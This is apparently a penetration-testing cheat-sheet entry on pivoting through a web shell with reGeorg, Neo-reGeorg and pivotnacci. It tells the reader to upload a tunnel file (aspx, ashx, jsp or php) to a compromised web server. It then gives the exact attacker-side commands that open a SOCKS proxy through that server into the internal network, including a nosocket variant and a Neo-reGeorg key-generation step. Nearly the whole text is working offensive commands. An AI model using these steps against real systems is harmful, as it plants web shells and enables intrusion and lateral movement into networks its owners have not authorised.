Webshell Pivot
Tools: reGeorg / Neo-reGeorg / pivotnacci
TIP: reGeorg is only compatible with Python 2.7, Neo-reGeorg with Python 2 and Python3
1) On the pivot machine, upload tunnel.(aspx|ashx|jsp|php) to the web server, like a WebShell.
2) On the attacker machine, open the tunnel
python2 reGeorgSocksProxy.py -p 1080 -u https://$PIVOT:443/XXX/tunnel.jspTo bypass socket issues, use the nosocket tunnel version:
python2 reGeorgSocksProxy.py -l 127.0.0.1 -p 1081 -u https://$PIVOT:443/XXX//tunnel.nosocket.phppython3 neoreg.py generate -k pivotpasswordpython3 neoreg.py -k pivotpassword -u https://$PIVOT:443/tunnel.jsLast updated